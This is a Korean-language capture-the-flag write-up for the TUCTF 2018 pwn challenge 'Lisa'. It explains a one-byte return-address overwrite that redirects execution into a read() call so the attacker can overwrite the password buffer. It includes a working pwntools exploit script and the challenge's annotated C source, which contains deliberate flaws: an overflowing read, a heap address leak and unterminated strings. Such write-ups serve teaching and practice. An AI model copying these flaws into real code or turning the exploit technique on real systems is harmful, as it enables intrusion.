TUCTF 2018 PWN Lisa
요약
1-byte overflow(?) 문제이다.
RET 를 1-byte 만 변조할 수 있다.
strcmp(input, password); 를 만족하면 FLAG 가 주어지는 방식인데
input 은 사용자의 입력을 받는 부분이고
password(share) 는 우리가 알 수 없는 값이다.
RET 를 main+0xD5 로 덮어주면
read 함수를 실행하기 바로 직전이 되는데
32 bit 바이너리의 cdecl 함수 호출 규약에 따라
스택 영역에 fd, buf, nbytes 를
공격자의 입맛대로 넣어주기만 하면
원하는 공간에 덮을 수 있다.
password 의 주소는 바이너리에서 친절하게 주어졌기 때문에
password 를 덮어씌워
input 값과 똑같이만 만들면 된다.
# Interaction script for the challenge binary (pwntools). Written for the
# Python 2 API: payloads are built as str; on Python 3, p32() returns bytes
# and '' + p32(...) would raise TypeError.
from pwn import *
r = process('./lisa')
r.recvuntil(': ')
# The binary prints the heap address of `pass` ("Here's your share: %p");
# the writeup calls that value `share`.
share = int(r.recvline(), 16)
log.success(hex(share))
r.recvuntil('.\n')
# First input (main's 0x30-byte read into s). It is laid out as the three
# cdecl arguments a later read() call will find on the 32-bit stack.
payload = ''
payload += p32(0) # fd
payload += p32(share) # buf
payload += p32(1) # nbytes
r.send(payload)
r.recvline()
# Second input (fail()'s 0x1D-byte read into the 0x18-byte buffer): 0x1C
# bytes of filler, then one byte that replaces only the low byte of the
# saved return address.
payload = ''
payload += '\0' * 0x1C
payload += '\x15' # 0x56???D15 (main+0xD5)
r.send(payload)
# The single byte consumed by read(0, share, 1): it lands at pass[0].
# s already starts with p32(0), so both strings compare as empty.
r.send('\0')
r.interactive()
// gcc -o lisa lisa.c -m32 -mpreferred-stack-boundary=2
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
/* Globals shared between main() and checkPass():
 *   inp  - points at main()'s stack buffer holding the user's input
 *   pass - heap buffer (0x2B bytes) filled from ./password
 *   pfd  - descriptor returned by open("./password", 0); never checked
 */
char *inp, *pass;
int pfd;
void lisa();
/* Failure path: prints a taunt, then reads up to 0x1D (29) bytes from stdin
 * into buf. buf's size is not part of the interface, so the bound is the
 * caller's responsibility; the only caller (checkPass) passes a 0x18-byte
 * stack array, so up to 5 bytes are written past its end. The return value
 * of read() is ignored.
 */
void fail(void *buf)
{
puts("Ugh! You kiss your mother with that mouth?");
read(0, buf, 0x1Du); /* 0x1D > sizeof the caller's buffer */
return;
}
/* Returns 1 when s1 and s2 are byte-for-byte equal NUL-terminated strings,
 * 0 otherwise. Both arguments must be NUL-terminated; strcmp() keeps reading
 * until it finds a terminator or a difference.
 */
int doStrcmp(char *s1, char *s2)
{
    return !strcmp(s1, s2);
}
/* Compares the user's input (inp) against the password (pass) and
 * dispatches to lisa() on a match or fail() otherwise. Both strings are
 * filled by raw read() calls in main() and are not guaranteed to be
 * NUL-terminated.
 */
void checkPass()
{
/* 0x18-byte local whose only use is as fail()'s destination; fail() reads
 * 0x1D bytes into it, i.e. 5 bytes beyond the array. Per the bp-18h
 * annotation the array sits directly below the saved frame pointer, which
 * is why the writeup can change one byte of the return address. */
char buf[0x18]; // [sp+0h] [bp-18h]@3
if ( doStrcmp(inp, pass) )
lisa();
else
fail(buf);
return;
}
/* Success path: prints an ASCII-art banner and, partway through it, the
 * contents of ./flag. The flag is printed via system(), which runs the
 * command through the shell with the process's environment; that is
 * acceptable for a CTF binary but is the pattern a reviewer would flag in
 * anything else (a direct fopen()/fputs() of ./flag needs no shell).
 */
void lisa()
{
puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!>''''''<!!!!!!!!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!!!!!!!!'''''` ``'!!!!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!!!!''` ..... `'!!!!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!!!'` . :::::' `'!!!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!!!' . ' .::::' `!!!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!!!' : ````` `!!!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!!! .,cchcccccc,,. `!!!!!!!!!!!!");
puts("!!!!!!!!!!!!!!! .-\"?$$$$$$$$$$$$$$c, `!!!!!!!!!!!");
puts("!!!!!!!!!!!!!! ,ccc$$$$$$$$$$$$$$$$$$$, `!!!!!!!!!!");
puts("!!!!!!!!!!!!! z$$$$$$$$$$$$$$$$$$$$$$$$;. `!!!!!!!!!");
puts("!!!!!!!!!!!! <$$$$$$$$$$$$$$$$$$$$$$$$$$:. `!!!!!!!!");
puts("!!!!!!!!!!! $$$$$$$$$$$$$$$$$$$$$$$$$$$h;:. !!!!!!!!");
puts("!!!!!!!!!!' $$$$$$$$$$$$$$$$$$$$$$$$$$$$$h;. !!!!!!!");
puts("!!!!!!!!!' <$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ !!!!!!!");
puts("!!!!!!!!' `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F `!!!!!!");
puts("!!!!!!!! c$$$$???$$$$$$$P\"\" \"\"\"??????\" !!!!!!");
puts("!!!!!!! `\"\" .,.. \"$$$$F .,zcr !!!!!!");
printf("\t\t\t\t");
/* Flag output is interleaved with the banner; spawns a shell to do it. */
system("/bin/cat ./flag");
puts("!!!!!!!! <. $$c= <$d$$$ <$$$$=-=+\"$$$$$$$ !!!!!!");
puts("!!!!!!! d$$$hcccd$$$$$ d$$$hcccd$$$$$$$F `!!!!!");
puts("!!!!!! ,$$$$$$$$$$$$$$h d$$$$$$$$$$$$$$$$ `!!!!!");
puts("!!!!! `$$$$$$$$$$$$$$$<$$$$$$$$$$$$$$$$' !!!!!");
puts("!!!!! `$$$$$$$$$$$$$$$$\"$$$$$$$$$$$$$P> !!!!!");
puts("!!!!! ?$$$$$$$$$$$$??$c`$$$$$$$$$$$?>' `!!!!");
puts("!!!!! `?$$$$$$I7?\"\" ,$$$$$$$$$?>>' !!!!");
puts("!!!!!. <<?$$$$$$c. ,d$$?$$$$$F>>'' `!!!");
puts("!!!!!! <i?$P\"??$$r--\"?\"\" ,$$$$h;>'' `!!!");
puts("!!!!!! $$$hccccccccc= cc$$$$$$$>>' !!!");
puts("!!!!! `?$$$$$$F\"\"\"\" `\"$$$$$>>>'' `!!");
puts("!!!!! \"?$$$$$cccccc$$$$??>>>>' !!");
puts("!!!!> \"$$$$$$$$$$$$$F>>>>'' `!");
puts("!!!!! \"$$$$$$$$???>''' !");
puts("!!!!!> `\"\"\"\"\" `");
puts("!!!!!!; . `");
puts("!!!!!!! ?h.");
puts("!!!!!!!! $$c,");
puts("!!!!!!!!> ?$$$h. .,c");
puts("!!!!!!!!! $$$$$$$$$hc,.,,cc$$$$$");
puts("!!!!!!!!! .,zcc$$$$$$$$$$$$$$$$$$$$$$");
puts("!!!!!!!!! .z$$$$$$$$$$$$$$$$$$$$$$$$$$$$");
puts("!!!!!!!!! ,d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ .");
puts("!!!!!!!!! ,d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ !!");
puts("!!!!!!!!! ,d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ,!'");
puts("!!!!!!!!> c$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$. !'");
puts("!!!!!!'' ,d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$> '");
puts("!!!'' z$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$>");
puts("!' ,$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$> ..");
puts(" z$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$' ;!!!!''`");
puts(" $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F ,;;!'`' .''");
puts(" <$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$> ,;'`' ,;");
puts(" `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F -' ,;!!'");
puts(" \"?$$$$$$$$$$?$$$$$$$$$$$$$$$$$$$$$$$$$$F .<!!!''' <!");
puts(" !> \"\"??$$$?C3$$$$$$$$$$$$$$$$$$$$$$$$\"\" ;!''' !!!");
puts(" ;!!!!;, `\"''\"\"????$$$$$$$$$$$$$$$$\"\" ,;-'' ',!");
puts(" ;!!!!<!!!; . `\"\"\"\"\"\"\"\"\"\"\" `' ' '");
puts(" !!!! ;!!! ;!!!!>;,;, .. ' . ' '");
puts(" !!' ,;!!! ;'`!!!!!!!!;!!!!!; . >' .'' ;");
puts(" !!' ;!!'!';! !! !!!!!!!!!!!!! ' -'");
puts(" <!! !! `!;! `!' !!!!!!!!!!<! .");
puts(" `! ;! ;!!! <' <!!!! `!!! < /");
puts(" `; !> <!! ;' !!!!' !!';! ;'");
puts(" ! ! !!! ! `!!! ;!! ! ' '");
puts(" ; `! `!! ,' !' ;!'");
puts(" ' /`! ! < !! < '");
puts(" / ;! >;! ;>");
puts(" !' ; !! '");
puts(" ' ;! > ! '");
puts(" '");
return;
}
/* Entry point: prints the heap address of the password buffer, reads the
 * user's input, loads ./password, and hands both to checkPass().
 *
 * Things a reviewer would note (all visible below):
 *   - the %p print deliberately discloses a heap address (the challenge's
 *     "share"); no real program should do this
 *   - read(0, s, 0x30) may fill s completely, so s is only NUL-terminated
 *     if the input is shorter than 0x30 bytes (the memset zeroes the tail)
 *   - open() and both read() results are unchecked; pass is malloc'd, never
 *     zeroed, and never NUL-terminated, so strcmp() on it depends entirely
 *     on the contents of ./password
 */
int main()
{
char s[0x30]; // [sp+0h] [bp-34h]@1
setvbuf(stdout, NULL, _IONBF, 0x14u); /* unbuffered so prompts are flushed */
setvbuf(stdin, NULL, _IONBF, 0x14u);
memset(&s, 0, 0x30u);
pass = malloc(0x2Bu); /* return value not checked */
printf("Here's your share: %p\n", pass); /* heap address disclosure */
puts("What? The Mona Lisa!\nLook, if you want somethin' from me, I'm gonna need somethin' from you alright...");
read(0, s, 0x30u); /* full-size read: no terminator guaranteed */
inp = s;
pfd = open("./password", 0); /* -1 on failure is not handled */
read(pfd, pass, 0x2Bu); /* no NUL terminator written into pass */
checkPass();
return 0;
}